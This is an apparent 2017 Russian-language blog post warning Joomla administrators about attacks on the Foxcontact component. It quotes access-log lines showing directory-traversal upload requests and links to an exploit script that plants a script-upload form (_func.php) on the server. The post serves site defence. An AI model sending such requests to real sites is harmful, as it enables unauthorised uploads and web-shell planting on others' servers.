А еще сейчас волна хакинга Джумлы через Foxcontact.
хакают так - "GET /components/com_foxcontact/lib/file-uploader.php?cid=2&mid=2&qqfile=/../../../../by.htm HTTP/1.1" 500 185 "-" "Mozilla/5.0"
(не работает, лол)
Или так - "GET /index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=2?cid=2&mid=2&qqfile=/../../../../by.htm HTTP/1.1" 200 491 "-" "Mozilla/5.0"
ссылочка на эксплойт - https://github.com/2inf3rna...ob/master/exploit.py
Проверьте себя. Загуржает в components/com_foxcontact/ файл _func.php - форму загрузки на сервер скриптов.
П.С. НЕ работает если загрузка аттачей в форме выключена.
09 Oct
2017
directory traversal
Шёл 2017 год…